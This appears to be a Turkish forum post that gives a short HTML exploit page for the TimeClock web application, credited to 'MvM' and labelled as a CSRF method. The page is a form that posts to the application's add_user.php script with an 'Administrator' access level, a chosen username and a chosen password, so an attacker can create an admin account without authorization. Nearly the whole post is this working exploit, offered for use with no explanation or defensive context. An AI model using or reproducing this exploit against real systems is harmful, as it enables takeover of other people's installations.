Kod:
[B][B][COLOR=Red][SIZE=5]===[ Exploit ]===
<html>
<head>
<title>TimeClock Remote Add Admin Exploit[By:MvM]</title>
<**** http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>
<body>
<form method="post" action="http://localhost/scripts/add_user.php">
<table border="1">
<tr>
<td align="center"><b>Adding User</b></td>
</tr>
<tr>
<td>
<table>
<tr>
<td align="right">First Name: </td><td align="left"><input type="text" name="fname" size="30"></td>
</tr>
<tr>
<td align="right">Last Name: </td><td align="left"><input type="text" name="lname" size="30"></td>
</tr>
<tr>
<td align="right">Access Level: </td>
<td>
<select name="access_level">
<option value="Administrator">Administrator</option>
<option value="User">User</option>
</select>
</td>
</tr>
<tr>
<td align="right">Username: </td><td align="left"><input type="text" name="u_name" size="30"></td>
</tr>
<tr>
<td align="right">Password: </td><td align="left"><input type="text" name="user_password" size="30"></td>
</tr>
<tr>
<td> </td><td><input type="submit" name="submit" value="Add" class="button"> <input type="submit" name="cancel" value="Cancel" class="button"></td>
</tr>
</table>
</td>
</tr>
</table>
</form>
</body>
</html>[/SIZE][/COLOR][/B][/B]yöntem : csrf
